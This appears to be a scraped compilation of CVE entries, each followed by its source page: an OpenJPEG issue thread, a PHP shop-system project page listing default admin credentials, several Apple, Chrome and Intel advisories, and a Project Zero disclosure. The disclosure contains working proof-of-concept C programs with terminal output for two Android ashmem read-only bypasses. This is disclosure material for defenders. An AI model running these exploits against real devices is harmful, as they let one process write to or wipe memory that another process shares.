OpenJPEG through 2.3.1 has a heap-based buffer overflow in opj_t1_clbl_decode_processor in openjp2/t1.c because of lack of opj_j2k_update_image_dimensions validation.

**Comments**

rouault added a commit to rouault/openjpeg that referenced this issue

Jan 11, 2020

rouault added a commit that referenced this issue

Jan 11, 2020

opj\_j2k\_update\_image\_dimensions(): reject images whose coordinates are beyond INT\_MAX (fixes #1228)

andreafioraldi added a commit to andreafioraldi/oss-fuzz that referenced this issue

Feb 17, 2021

Seems that some bugs in openjpeg can be triggered only in release mode.
More specifically, I was trying to reproduce uclouvain/openjpeg#1228 using the OSS-Fuzz harness and I failed.
I figured out that the bug is indeed reachable by the harness, but can be uncovered only in Release mode, otherwise, an assertion error blocks it.
I guess that they use assertions only in Debug mode (WTF) and remove them in Release.
So, IMO openjpeg should be fuzzed in Release mode as the configuration used in production is the one relevant for security.

inferno-chromium pushed a commit to google/oss-fuzz that referenced this issue

Feb 18, 2021

Seems that some bugs in openjpeg can be triggered only in release mode.
More specifically, I was trying to reproduce uclouvain/openjpeg#1228 using the OSS-Fuzz harness and I failed.
I figured out that the bug is indeed reachable by the harness, but can be uncovered only in Release mode, otherwise, an assertion error blocks it.
I guess that they use assertions only in Debug mode (WTF) and remove them in Release.
So, IMO openjpeg should be fuzzed in Release mode as the configuration used in production is the one relevant for security.

CVE-2020-6851: Heap buffer overflow in libopenjp2 · Issue #1228 · uclouvain/openjpeg

Use after free in media picker in Google Chrome prior to 79.0.3945.88 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page.

CVE-2019-13767

PHPGurukul Dairy Farm Shop Management System 1.0 is vulnerable to XSS, as demonstrated by the category and CategoryCode parameters in add-category.php, the CompanyName parameter in add-company.php, and the ProductName parameter in add-product.php.

**Dairy Farm Shop Management System Using PHP and MySQL**

  

**Project Name**               :  Dairy Farm Shop Management System Project (DFSMS)

**Language Used                   :**  PHP

**Database                              :**  MySQL

**User Interface Design       :**  HTML, AJAX,JQUERY,JAVASCRIPT

**Web Browser                       :**  Mozilla, Google Chrome, IE8, OPERA

**Software                               :**  XAMPP / Wamp / Mamp/ Lamp (anyone)

DFSMS is a web-based application which manages the products of dairy shop. It has one module i.e. admin who manages all the functions of the dairy shop.

**Admin Features :**

**Dashboard:** In this section, admin can see all detail in brief like Total listed categories, companies, products and also see the sales.

**Category:** In this section, admin can add new categories and edit, delete old categories.

**Company:** In this section, admin can add new companies and edit, delete old companies.

**Product:** In this section, admin can add new products and edit old products.

**Search:** In this section, admin can search for a product then add the product into the cart and generate invoice /receipt.

**Invoices:** In this section, admin can view all generated invoices/receipts.

**Reports**: In this section, admin can generate two reports, one is B/w date and another one is for sales.

Admin can also update his profile, change the password and recover the password.

**Some Project Screenshots**

**Login Page**

**Login Page**

**Admin Dashboard**

**Admin Dashboard**

**Add Product Page**

**Add Product Page**

**Invoice Page**

**Invoice**

**How to run the Dairy Farm Shop Management System Project (DFSMS)**

1\. Download the zip file

2\. Extract the file and copy dfsms folder

3.Paste inside root directory(for xampp xampp/htdocs, for wamp wamp/www, for lamp var/www/html)

4\. Open PHPMyAdmin (http://localhost/phpmyadmin)

5\. Create a database with name dfsms

6\. Import dfsms.sql file(given inside the zip package in SQL file folder)

7.Run the script http://localhost/dfsms

**Admin Credential**

**Username:** admin  
**Password:** Test@123

**View Demo——————————————**

Download Full Source Code (DFSMS)

Size: 9.84 MB

Version: V 1.1

Anuj Kumar

Hi! I am Anuj Kumar, a professional web developer with 5+ years of experience in this sector. I found PHPGurukul in September 2015. My keen interest in technology and sharing knowledge with others became the main reason for starting PHPGurukul. My basic aim is to offer all web development tutorials like PHP, PDO, jQuery, PHP oops, MySQL, etc. Apart from the tutorials, we also offer you PHP Projects, and we have around 100+ PHP Projects for you.

CVE-2020-5308: Dairy Farm Shop Management System Project, Dairy Farm Shop Management System in Php

In calc_vm_may_flags of ashmem.c, there is a possible arbitrary write to shared memory due to a permissions bypass. This could lead to local escalation of privilege by corrupting memory shared between processes, with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android kernel Android ID: A-142938932

    Android: ashmem readonly bypasses via remap_file_pages() and ASHMEM_UNPINThis bug report describes two ways in which an attacker can modify the contentsof a read-only ashmem fd. I'm not sure at this point what the most interestinguser of ashmem is in the current Android release, but there are various users,including Chrome and a bunch of utility classes.In AOSP master, there is even code in<https://android.googlesource.com/platform/art/+/master/runtime/jit/jit_memory_region.cc>that uses ashmem for some JIT zygote mapping, which sounds extremelyinteresting.Android's ashmem kernel driver has an ->mmap() handler that attempts to lockdown created VMAs based on a configured protection mask such that in particularwrite access to the underlying shmem file can never be gained. It tries to dothis as follows (code taken from upstream Linuxdrivers/staging/android/ashmem.c):    static inline vm_flags_t calc_vm_may_flags(unsigned long prot)    {            return _calc_vm_trans(prot, PROT_READ,  VM_MAYREAD) |                   _calc_vm_trans(prot, PROT_WRITE, VM_MAYWRITE) |                   _calc_vm_trans(prot, PROT_EXEC,  VM_MAYEXEC);    }    [...]    static int ashmem_mmap(struct file *file, struct vm_area_struct *vma)    {            struct ashmem_area *asma = file->private_data;    [...]            /* requested protection bits must match our allowed protection mask */            if ((vma->vm_flags & ~calc_vm_prot_bits(asma->prot_mask, 0)) &                calc_vm_prot_bits(PROT_MASK, 0)) {                    ret = -EPERM;                    goto out;            }            vma->vm_flags &= ~calc_vm_may_flags(~asma->prot_mask);    [...]            if (vma->vm_file)                    fput(vma->vm_file);            vma->vm_file = asma->file;    [...]            return ret;    }This ensures that the protection flags specified by the caller don't conflictwith the ->prot_mask, and it also clears the VM_MAY* flags as needed to preventthe user from afterwards adding new protection flags via mprotect().However, it improperly stores the backing shmem file, whose ->mmap() handlerdoes not enforce the same restrictions, in ->vm_file. An attacker can abuse thisthrough the remap_file_pages() syscall, which grabs the file pointer of anexisting VMA and calls its ->mmap() handler to create a new VMA. In effect,calling remap_file_pages(addr, size, 0, 0, 0) on an ashmem mapping allows anattacker to raise the VM_MAYWRITE bit, allowing the attacker to gain writeaccess to the ashmem allocation's backing file via mprotect().Reproducer (works both on Linux from upstream master in an X86 VM and on aPixel 2 at security patch level 2019-09-05 via adb):====================================================================user@vm:~/ashmem_remap$ cat ashmem_remap_victim.c#include <unistd.h>#include <stdlib.h>#include <fcntl.h>#include <err.h>#include <stdio.h>#include <sys/mman.h>#include <sys/ioctl.h>#include <sys/wait.h>#define __ASHMEMIOC   0x77#define ASHMEM_SET_SIZE   _IOW(__ASHMEMIOC, 3, size_t)#define ASHMEM_SET_PROT_MASK  _IOW(__ASHMEMIOC, 5, unsigned long)int main(void) {  int ashmem_fd = open(\"/dev/ashmem\", O_RDWR);  if (ashmem_fd == -1)    err(1, \"open ashmem\");  if (ioctl(ashmem_fd, ASHMEM_SET_SIZE, 0x1000))    err(1, \"ASHMEM_SET_SIZE\");  char *mapping = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, ashmem_fd, 0);  if (mapping == MAP_FAILED)    err(1, \"mmap ashmem\");  if (ioctl(ashmem_fd, ASHMEM_SET_PROT_MASK, PROT_READ))    err(1, \"ASHMEM_SET_SIZE\");  mapping[0] = 'A';  printf(\"mapping[0] = '%c'\\", mapping[0]);  if (dup2(ashmem_fd, 42) != 42)    err(1, \"dup2\");  pid_t child = fork();  if (child == -1)    err(1, \"fork\");  if (child == 0) {    execl(\"./ashmem_remap_attacker\", \"ashmem_remap_attacker\", NULL);    err(1, \"execl\");  }  int status;  if (wait(&status) != child) err(1, \"wait\");  printf(\"mapping[0] = '%c'\\", mapping[0]);}user@vm:~/ashmem_remap$ cat ashmem_remap_attacker.c#define _GNU_SOURCE#include <unistd.h>#include <sys/mman.h>#include <err.h>#include <stdlib.h>#include <stdio.h>int main(void) {  int ashmem_fd = 42;  /* sanity check */  char *write_mapping = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, ashmem_fd, 0);  if (write_mapping == MAP_FAILED) {    perror(\"mmap ashmem writable failed as expected\");  } else {    errx(1, \"trivial mmap ashmem writable worked???\");  }  char *mapping = mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, ashmem_fd, 0);  if (mapping == MAP_FAILED)    err(1, \"mmap ashmem readonly failed\");  if (mprotect(mapping, 0x1000, PROT_READ|PROT_WRITE) == 0)    errx(1, \"mprotect ashmem writable worked???\");  if (remap_file_pages(mapping, /*size=*/0x1000, /*prot=*/0, /*pgoff=*/0, /*flags=*/0))    err(1, \"remap_file_pages\");  if (mprotect(mapping, 0x1000, PROT_READ|PROT_WRITE))    err(1, \"mprotect ashmem writable failed, attack didn't work\");  mapping[0] = 'X';  puts(\"attacker exiting\");}user@vm:~/ashmem_remap$ gcc -o ashmem_remap_victim ashmem_remap_victim.cuser@vm:~/ashmem_remap$ gcc -o ashmem_remap_attacker ashmem_remap_attacker.cuser@vm:~/ashmem_remap$ ./ashmem_remap_victimmapping[0] = 'A'mmap ashmem writable failed as expected: Operation not permittedattacker exitingmapping[0] = 'X'user@vm:~/ashmem_remap$ ====================================================================Interestingly, the (very much deprecated) syscall remap_file_pages() isn't evenlisted in bionic's SYSCALLS.txt, which would normally cause it to be blocked byAndroid's seccomp policy; however, SECCOMP_WHITELIST_APP.txt explicitly permitsit for 32-bit ARM applications:    # b/36435222    int remap_file_pages(void *addr, size_t size, int prot, size_t pgoff, int flags)  arm,x86,mipsashmem supports purgable memory via ASHMEM_UNPIN/ASHMEM_PIN. Unfortunately,there is no access control for these - even if you only have read-only access toan ashmem file, you can still mark pages in it as purgable, causing them toeffectively be zeroed out when the system is under memory pressure. Here's asimple test for that (to be run in an X86 Linux VM):====================================================================user@vm:~/ashmem_purging$ cat ashmem_purge_victim.c#include <unistd.h>#include <stdlib.h>#include <fcntl.h>#include <err.h>#include <stdio.h>#include <sys/mman.h>#include <sys/ioctl.h>#include <sys/wait.h>#define __ASHMEMIOC   0x77#define ASHMEM_SET_SIZE   _IOW(__ASHMEMIOC, 3, size_t)#define ASHMEM_SET_PROT_MASK  _IOW(__ASHMEMIOC, 5, unsigned long)int main(void) {  int ashmem_fd = open(\"/dev/ashmem\", O_RDWR);  if (ashmem_fd == -1)    err(1, \"open ashmem\");  if (ioctl(ashmem_fd, ASHMEM_SET_SIZE, 0x1000))    err(1, \"ASHMEM_SET_SIZE\");  char *mapping = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, ashmem_fd, 0);  if (mapping == MAP_FAILED)    err(1, \"mmap ashmem\");  if (ioctl(ashmem_fd, ASHMEM_SET_PROT_MASK, PROT_READ))    err(1, \"ASHMEM_SET_SIZE\");  mapping[0] = 'A';  printf(\"mapping[0] = '%c'\\", mapping[0]);  if (dup2(ashmem_fd, 42) != 42)    err(1, \"dup2\");  pid_t child = fork();  if (child == -1)    err(1, \"fork\");  if (child == 0) {    execl(\"./ashmem_purge_attacker\", \"ashmem_purge_attacker\", NULL);    err(1, \"execl\");  }  int status;  if (wait(&status) != child) err(1, \"wait\");  printf(\"mapping[0] = '%c'\\", mapping[0]);}user@vm:~/ashmem_purging$ cat ashmem_purge_attacker.c#include <unistd.h>#include <stdlib.h>#include <fcntl.h>#include <err.h>#include <stdio.h>#include <sys/mman.h>#include <sys/ioctl.h>struct ashmem_pin {  unsigned int offset, len;};#define __ASHMEMIOC   0x77#define ASHMEM_SET_SIZE   _IOW(__ASHMEMIOC, 3, size_t)#define ASHMEM_UNPIN    _IOW(__ASHMEMIOC, 8, struct ashmem_pin)int main(void) {  struct ashmem_pin pin = { 0, 0 };  if (ioctl(42, ASHMEM_UNPIN, &pin))    err(1, \"unpin 42\");  /* ensure that shrinker doesn't get skipped */  int ashmem_fd = open(\"/dev/ashmem\", O_RDWR);  if (ashmem_fd == -1)    err(1, \"open ashmem\");  if (ioctl(ashmem_fd, ASHMEM_SET_SIZE, 0x100000))    err(1, \"ASHMEM_SET_SIZE\");  char *mapping = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, ashmem_fd, 0);  if (mapping == MAP_FAILED)    err(1, \"mmap ashmem\");  if (ioctl(ashmem_fd, ASHMEM_UNPIN, &pin))    err(1, \"unpin 42\");  /* simulate OOM */  system(\"sudo sh -c 'echo 2 > /proc/sys/vm/drop_caches'\");  puts(\"attacker exiting\");}user@vm:~/ashmem_purging$ gcc -o ashmem_purge_victim ashmem_purge_victim.cuser@vm:~/ashmem_purging$ gcc -o ashmem_purge_attacker ashmem_purge_attacker.cuser@vm:~/ashmem_purging$ ./ashmem_purge_victimmapping[0] = 'A'attacker exitingmapping[0] = ''user@vm:~/ashmem_purging$ ====================================================================This bug is subject to a 90 day disclosure deadline. After 90 days elapseor a patch has been made broadly available (whichever is earlier), the bugreport will become visible to the public.Related CVE Numbers: CVE-2020-0009.Found by: jannh@google.com

CVE-2020-0009: Android ashmem Read-Only Bypasses ≈ Packet Storm

Out of bounds access in SwiftShader in Google Chrome prior to 73.0.3683.75 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.

CVE-2019-5844

**Chrome Releases**

Release updates from the Chrome team

CVE-2019-5845: Stable Channel Update for Desktop

CVE-2019-5846

A logic issue was addressed with improved state management. This issue is fixed in tvOS 13, iTunes for Windows 12.10.1, iCloud for Windows 10.7, iCloud for Windows 7.14. Processing maliciously crafted web content may lead to universal cross site scripting.

Released October 7, 2019

**CoreCrypto**

Available for: Windows 7 and later

Impact: Processing a large input may lead to a denial of service

Description: A denial of service issue was addressed with improved input validation.

CVE-2019-8741: Nicky Mouha of NIST

Entry added October 29, 2019

**CoreMedia**

Available for: Windows 7 and later

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved state management.

CVE-2019-8825: Found by GWP-ASan in Google Chrome

Entry added October 29, 2019

**Foundation**

Available for: Windows 7 and later

Impact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2019-8746: natashenka and Samuel Groß of Google Project Zero

Entry added October 29, 2019

**libxml2**

Available for: Windows 7 and later

Impact: Multiple issues in libxml2

Description: Multiple memory corruption issues were addressed with improved input validation.

CVE-2019-8749: found by OSS-Fuzz

CVE-2019-8756: found by OSS-Fuzz

Entry added October 29, 2019

**libxslt**

Available for: Windows 7 and later

Impact: Multiple issues in libxslt

Description: Multiple memory corruption issues were addressed with improved input validation.

CVE-2019-8750: found by OSS-Fuzz

Entry added October 29, 2019

**UIFoundation**

Available for: Windows 7 and later

Impact: Processing a maliciously crafted text file may lead to arbitrary code execution

Description: A buffer overflow was addressed with improved bounds checking.

CVE-2019-8745: riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative

**WebKit**

Available for: Windows 7 and later

Impact: Processing maliciously crafted web content may lead to universal cross site scripting

Description: A logic issue was addressed with improved state management.

CVE-2019-8625: Sergei Glazunov of Google Project Zero

CVE-2019-8719: Sergei Glazunov of Google Project Zero

CVE-2019-8764: Sergei Glazunov of Google Project Zero

Entry updated October 29, 2019

**WebKit**

Available for: Windows 7 and later

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: Multiple memory corruption issues were addressed with improved memory handling.

CVE-2019-8707: an anonymous researcher working with Trend Micro's Zero Day Initiative, cc working with Trend Micro Zero Day Initiative

CVE-2019-8710: found by OSS-Fuzz

CVE-2019-8726: Jihui Lu of Tencent KeenLab

CVE-2019-8728: Junho Jang of LINE Security Team and Hanul Choi of ABLY Corporation

CVE-2019-8733: Sergei Glazunov of Google Project Zero

CVE-2019-8734: found by OSS-Fuzz

CVE-2019-8735: G. Geshev working with Trend Micro Zero Day Initiative

CVE-2019-8743: zhunki from Codesafe Team of Legendsec at Qi'anxin Group

CVE-2019-8751: Dongzhuo Zhao working with ADLab of Venustech

CVE-2019-8752: Dongzhuo Zhao working with ADLab of Venustech

CVE-2019-8763: Sergei Glazunov of Google Project Zero

CVE-2019-8765: Samuel Groß of Google Project Zero

CVE-2019-8766: found by OSS-Fuzz

CVE-2019-8773: found by OSS-Fuzz

Entry updated October 29, 2019

**WebKit**

Available for: Windows 7 and later

Impact: Processing maliciously crafted web content may lead to universal cross site scripting

Description: A validation issue was addressed with improved logic.

CVE-2019-8762: Sergei Glazunov of Google Project Zero

Entry added November 18, 2019

CVE-2019-8719: About the security content of iTunes 12.10.1 for Windows

Improper conditions check in the Linux kernel driver for the Intel(R) FPGA SDK for OpenCL(TM) Pro Edition before version 19.4 may allow an authenticated user to potentially enable denial of service via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® FPGA SDK for OpenCL™ Advisory**

**Summary: **

A potential security vulnerability in the Intel® Field Programmable Gate Array (FPGA) Software Development Kit (SDK) for OpenCL™ may allow denial of service.  Intel is releasing Linux kernel driver updates to mitigate this potential vulnerability.

**Vulnerability Details:**

CVEID: CVE-2019-11165  

Description: Improper conditions check in the Linux kernel driver for the Intel(R) FPGA SDK for OpenCL(TM) Pro Edition before version 19.4 may allow an authenticated user to potentially enable denial of service via local access.

CVSS Base Score: 5.0 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H

**Affected Products:**

Intel® FPGA SDK for OpenCL™ before version 19.4.

**Recommendations:**

Intel recommends updating Intel® FPGA SDK for OpenCL™ to version 19.3 and to download and install patch 0.24 on version 19.3:

http://download.altera.com/akdlm/software/acs/19.3/0.24cl/opencl-19.3-0.24cl-linux.run

Intel® FPGA SDK for OpenCL™ version 19.4 and future versions will contain the fix.

Intel® FPGA SDK for OpenCL™ is available for download at this location: http://fpgasoftware.intel.com/opencl/

**Acknowledgements:**

Intel would like to thank Nitin Pundir for reporting this issue.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

12/10/2019

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2019-11165: INTEL-SA-00284

Improper permissions in the installer for the License Server software for Intel® Quartus® Prime Pro Edition before version 19.3 may allow an authenticated user to potentially enable escalation of privilege via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® Quartus® Prime Pro Edition Advisory**

Intel ID:

INTEL-SA-00311

Advisory Category:

Software

Impact of vulnerability:

Escalation of Privilege, Denial of Service

Severity rating:

MEDIUM

Original release:

12/10/2019

Last revised:

12/10/2019

**Summary: **

Potential security vulnerabilities in Intel® Quartus® Prime Pro Edition may allow escalation of privilege and/or denial of service. Intel is releasing software updates to mitigate this potential vulnerability.

**Vulnerability Details:**

CVEID: CVE-2019-14604

Description: Null pointer dereference in the FPGA kernel driver for Intel(R) Quartus(R) Prime Pro Edition before version 19.3 may allow an authenticated user to potentially enable denial of service via local access.

CVSS Base Score: 6.8 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:H

CVEID: CVE-2019-14603  

Description: Improper permissions in the installer for the License Server software for Intel® Quartus® Prime Pro Edition before version 19.3 may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 6.7 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

**Affected Products:**

Intel® Quartus® Prime Pro before version 19.3.

**Recommendations:**

Intel recommends that users of Intel® Quartus® Prime Pro Edition update to 19.3 or later.

Updates are available for download at this location:

http://fpgasoftware.intel.com/?edition=pro

**Acknowledgements:**

Intel would like to thank Nitin Pundir (CVE-2019-14604) and Marius Gabriel Mihai (CVE-2019-14603).

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

12/10/2019

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

Tag

#chrome